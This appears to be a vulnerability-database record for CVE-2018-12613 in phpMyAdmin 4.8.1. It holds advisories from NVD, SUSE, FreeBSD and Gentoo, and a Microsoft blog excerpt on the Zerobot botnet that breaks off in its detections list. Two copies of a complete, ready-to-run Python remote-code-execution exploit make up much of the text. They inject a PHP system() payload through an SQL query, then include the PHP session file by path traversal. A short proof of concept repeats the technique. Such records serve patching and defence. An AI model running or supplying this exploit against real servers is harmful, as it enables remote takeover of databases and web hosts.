"version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36949", "href": "https://0day.today/exploit/description/36949", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n# Exploit Author: samguy\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\n# Vendor Homepage: http://www.phpmyadmin.net\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\n# Version: 4.8.1\n# Tested on: Linux - Debian Buster (PHP 7.3)\n# CVE : CVE-2018-12613\n\n#!/usr/bin/env python\n\nimport re, requests, sys\n\n# check python major version\nif sys.version_info.major == 3:\n import html\nelse:\n from six.moves.html_parser import HTMLParser\n html = HTMLParser()\n\nif len(sys.argv) < 7:\n usage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command]\nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\"\n print(usage.format(sys.argv[0],sys.argv[0]))\n exit()\n\ndef get_token(content):\n s = re.search('token\"\\s*value=\"(.*?)\"', content)\n token = html.unescape(s.group(1))\n return token\n\nipaddr = sys.argv[1]\nport = sys.argv[2]\npath = sys.argv[3]\nusername = sys.argv[4]\npassword = sys.argv[5]\ncommand = sys.argv[6]\n\nurl = \"http://{}:{}{}\".format(ipaddr,port,path)\n\n# 1st req: check login page and version\nurl1 = url + \"/index.php\"\nr = requests.get(url1)\ncontent = r.content.decode('utf-8')\nif r.status_code != 200:\n print(\"Unable to find the version\")\n exit()\n\ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content)\nversion = s.group(1)\nif version != \"4.8.0\" and version != \"4.8.1\":\n print(\"The target is not exploitable\".format(version))\n exit()\n\n# get 1st token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 2nd req: login\np = {'token': token, 'pma_username': username, 'pma_password': password}\nr = requests.post(url1, cookies = cookies, data = p)\ncontent = r.content.decode('utf-8')\ns = re.search('logged_in:(\\w+),', content)\nlogged_in = s.group(1)\nif logged_in == \"false\":\n print(\"Authentication failed\")\n exit()\n\n# get 2nd token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 3rd req: execute query\nurl2 = url + \"/import.php\"\n# payload\npayload = '''select '<?php system(\"{}\") ?>';'''.format(command)\np = {'table':'', 'token': token, 'sql_query': payload }\nr = requests.post(url2, cookies = cookies, data = p)\nif r.status_code != 200:\n print(\"Query failed\")\n exit()\n\n# 4th req: execute payload\nsession_id = cookies.get_dict()['phpMyAdmin']\nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id)\nr = requests.get(url3, cookies = cookies)\nif r.status_code != 200:\n print(\"Exploit failed\")\n exit()\n\n# get result\ncontent = r.content.decode('utf-8', errors=\"replace\")\ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL)\nif s != None:\n print(s.group(1))\n", "sourceHref": "https://0day.today/exploit/36949", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-23T14:18:21", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T20:29:00", "type": "cve", "title": "CVE-2018-12613", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-11-02T17:59:00", "cpe": [], "id": "CVE-2018-12613", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "dsquare": [{"lastseen": "2021-11-27T02:37:17", "description": "Remote Code Execution in phpMyAdmin\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-07T00:00:00", "type": "dsquare", "title": "phpMyAdmin 4.8.1 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-07T00:00:00", "id": "E-655", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-08-07T09:26:46", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-22T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-12613", "CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "EDB-ID:44928", "href": "https://www.exploit-db.com/exploits/44928", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\r\n# Date: 2018-06-21\r\n# Exploit Author: VulnSpy\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.0, 4.8.1\r\n# Tested on: php7 mysql5\r\n# CVE : CVE-2018-12613\r\n\r\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\r\n2. Include the session file :\r\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k", "sourceHref": "https://www.exploit-db.com/raw/44928", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-09-14T13:02:59", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 4.8.1 - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-12613", "CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "EDB-ID:50457", "href": "https://www.exploit-db.com/exploits/50457", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\r\n# Date: 17/08/2021\r\n# Exploit Author: samguy\r\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.1\r\n# Tested on: Linux - Debian Buster (PHP 7.3)\r\n# CVE : CVE-2018-12613\r\n\r\n#!/usr/bin/env python\r\n\r\nimport re, requests, sys\r\n\r\n# check python major version\r\nif sys.version_info.major == 3:\r\n import html\r\nelse:\r\n from six.moves.html_parser import HTMLParser\r\n html = HTMLParser()\r\n\r\nif len(sys.argv) < 7:\r\n usage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command]\r\nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\"\r\n print(usage.format(sys.argv[0],sys.argv[0]))\r\n exit()\r\n\r\ndef get_token(content):\r\n s = re.search('token\"\\s*value=\"(.*?)\"', content)\r\n token = html.unescape(s.group(1))\r\n return token\r\n\r\nipaddr = sys.argv[1]\r\nport = sys.argv[2]\r\npath = sys.argv[3]\r\nusername = sys.argv[4]\r\npassword = sys.argv[5]\r\ncommand = sys.argv[6]\r\n\r\nurl = \"http://{}:{}{}\".format(ipaddr,port,path)\r\n\r\n# 1st req: check login page and version\r\nurl1 = url + \"/index.php\"\r\nr = requests.get(url1)\r\ncontent = r.content.decode('utf-8')\r\nif r.status_code != 200:\r\n print(\"Unable to find the version\")\r\n exit()\r\n\r\ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content)\r\nversion = s.group(1)\r\nif version != \"4.8.0\" and version != \"4.8.1\":\r\n print(\"The target is not exploitable\".format(version))\r\n exit()\r\n\r\n# get 1st token and cookie\r\ncookies = r.cookies\r\ntoken = get_token(content)\r\n\r\n# 2nd req: login\r\np = {'token': token, 'pma_username': username, 'pma_password': password}\r\nr = requests.post(url1, cookies = cookies, data = p)\r\ncontent = r.content.decode('utf-8')\r\ns = re.search('logged_in:(\\w+),', content)\r\nlogged_in = s.group(1)\r\nif logged_in == \"false\":\r\n print(\"Authentication failed\")\r\n exit()\r\n\r\n# get 2nd token and cookie\r\ncookies = r.cookies\r\ntoken = get_token(content)\r\n\r\n# 3rd req: execute query\r\nurl2 = url + \"/import.php\"\r\n# payload\r\npayload = '''select '<?php system(\"{}\") ?>';'''.format(command)\r\np = {'table':'', 'token': token, 'sql_query': payload }\r\nr = requests.post(url2, cookies = cookies, data = p)\r\nif r.status_code != 200:\r\n print(\"Query failed\")\r\n exit()\r\n\r\n# 4th req: execute payload\r\nsession_id = cookies.get_dict()['phpMyAdmin']\r\nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id)\r\nr = requests.get(url3, cookies = cookies)\r\nif r.status_code != 200:\r\n print(\"Exploit failed\")\r\n exit()\r\n\r\n# get result\r\ncontent = r.content.decode('utf-8', errors=\"replace\")\r\ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL)\r\nif s != None:\r\n print(s.group(1))", "sourceHref": "https://www.exploit-db.com/raw/50457", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2021-06-08T18:43:49", "description": "This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n", "cvss3": {}, "published": "2018-06-23T15:08:44", "type": "suse", "title": "Security update for phpMyAdmin (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-12581"], "modified": "2018-06-23T15:08:44", "id": "OPENSUSE-SU-2018:1806-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00044.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:43:49", "description": "This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n", "cvss3": {}, "published": "2018-06-23T15:10:01", "type": "suse", "title": "Security update for phpMyAdmin (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-12581"], "modified": "2018-06-23T15:10:01", "id": "OPENSUSE-SU-2018:1809-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00046.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-06-23T15:10:47", "description": "\n\nThe phpMyAdmin development team reports:\n\nSummary\nXSS in Designer feature\nDescription\nA Cross-Site Scripting vulnerability was found in the\n\t Designer feature, where an attacker can deliver a\n\t payload to a user through a specially-crafted database\n\t name.\nSeverity\nWe consider this attack to be of moderate severity.\n\n\nSummary\nFile inclusion and remote code execution attack\nDescription\nA flaw has been discovered where an attacker can include\n\t (view and potentially execute) files on the server.\nThe vulnerability comes from a portion of code where\n\t pages are redirected and loaded within phpMyAdmin, and an\n\t improper test for whitelisted pages.\nAn attacker must be authenticated, except in these\n\t situations:\n\n$cfg['AllowArbitraryServer'] = true: attacker can\n\t specify any host he/she is already in control of, and\n\t execute arbitrary code on phpMyAdmin\n$cfg['ServerDefault'] = 0: this bypasses the login and\n\t runs the vulnerable code without any authentication\n\nSeverity\nWe consider this to be severe. Mitigation\n\t factor Configuring PHP with a restrictive\n\t `open_basedir` can greatly restrict an attacker's ability to\n\t view files on the server. Vulnerable systems should not be\n\t run with the phpMyAdmin directives\n\t $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault']\n\t = 0\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "freebsd", "title": "phpmyadmin -- remote code inclusion and XSS scripting", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "17CB6FF3-7670-11E8-8854-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/17cb6ff3-7670-11e8-8854-6805ca0b3d42.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-06-23T15:18:01", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases.\n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nPlease review the CVE identifiers referenced below for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.8.4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-15T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613", "CVE-2018-19968", "CVE-2018-19969", "CVE-2018-19970"], "modified": "2019-04-15T00:00:00", "id": "GLSA-201904-16", "href": "https://security.gentoo.org/glsa/201904-16", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * 